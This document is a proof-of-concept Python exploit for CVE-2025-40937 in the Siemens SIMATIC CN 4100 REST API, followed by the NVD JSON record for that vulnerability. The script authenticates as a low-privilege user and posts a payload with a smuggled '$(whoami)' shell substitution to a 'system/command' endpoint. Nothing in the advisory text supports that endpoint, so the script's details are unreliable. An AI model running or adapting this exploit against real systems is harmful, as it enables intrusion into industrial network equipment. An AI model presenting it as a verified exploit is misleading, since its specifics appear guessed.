CVE-2025-40937

# CVE-2025-40937 PoC - SIMATIC CN 4100 REST API Code Injection # Authenticated RCE via improper input validation import requests import json import sys TARGET_URL = "https://<target-ip>/api/v1/" USERNAME = "<low-privilege-user>" PASSWORD = "<password>" def get_auth_token(): """Obtain authentication token""" login_url = f"{TARGET_URL}auth/login" data = { "username": USERNAME, "password": PASSWORD } response = requests.post(login_url, json=data, verify=False, timeout=10) if response.status_code == 200: return response.json().get('token') return None def exploit(token): """Send malicious request with unexpected arguments""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Malicious payload exploiting improper input validation exploit_data = { "action": "execute", "command": "whoami", "_unexpected_param": "$(whoami)" } exploit_url = f"{TARGET_URL}system/command" response = requests.post(exploit_url, json=exploit_data, headers=headers, verify=False, timeout=10) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}") return response if __name__ == "__main__": print("[*] CVE-2025-40937 PoC for SIMATIC CN 4100") print("[*] Obtaining authentication token...") token = get_auth_token() if token: print("[+] Authentication successful") print("[*] Sending exploit payload...") exploit(token) else: print("[-] Authentication failed") sys.exit(1)

{"cve": {"id": "CVE-2025-40937", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:47.260", "lastModified": "2025-12-10T21:37:50.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application do not properly validate input parameters in its REST API, resulting in improper handling of unexpected arguments.\r\nThis could allow an authenticated attacker to execute arbitrary code with limited privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:siemens:simatic_cn_4100_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.1", "matchCriteriaId": "FF07D3DA-F412-4FBF-BB1B-3C889F74509E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:siemens:simatic_cn_4100:-:*:*:*:*:*:*:*", "matchCriteriaId": "92619F5F-3679-4424-9455-3285FF1EF2F1"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-416652.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}